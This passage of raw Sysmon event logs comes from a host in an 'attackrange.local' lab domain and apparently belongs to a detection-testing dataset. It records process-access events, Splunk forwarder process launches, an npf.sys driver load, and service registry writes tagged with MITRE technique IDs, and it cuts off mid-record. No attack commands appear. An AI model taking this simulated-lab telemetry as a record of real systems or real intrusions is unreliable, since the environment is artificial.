M32\ntdll.dll+51791 10341000x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE5-5FA1-5801-000000008801}2736C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE5-5FA1-5801-000000008801}2736C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.747{D28789B6-7CE5-5FA1-5801-000000008801}2736C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE6-5FA1-5901-000000008801}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE6-5FA1-5901-000000008801}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE6-5FA1-5901-000000008801}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.372{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE6-5FA1-5901-000000008801}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.373{D28789B6-7CE6-5FA1-5901-000000008801}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 644600x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.310C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.341{D28789B6-7C64-5FA1-1500-000000008801}13361656C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.310{D28789B6-7CE5-5FA1-5801-000000008801}27361164C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+201f2b|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6c153|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1031,T1050SetValue2020-11-03 15:53:10.310{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localT1031,T1050SetValue2020-11-03 15:53:10.310{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:11.859{D28789B6-7CE7-5FA1-5B01-000000008801}50402572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program 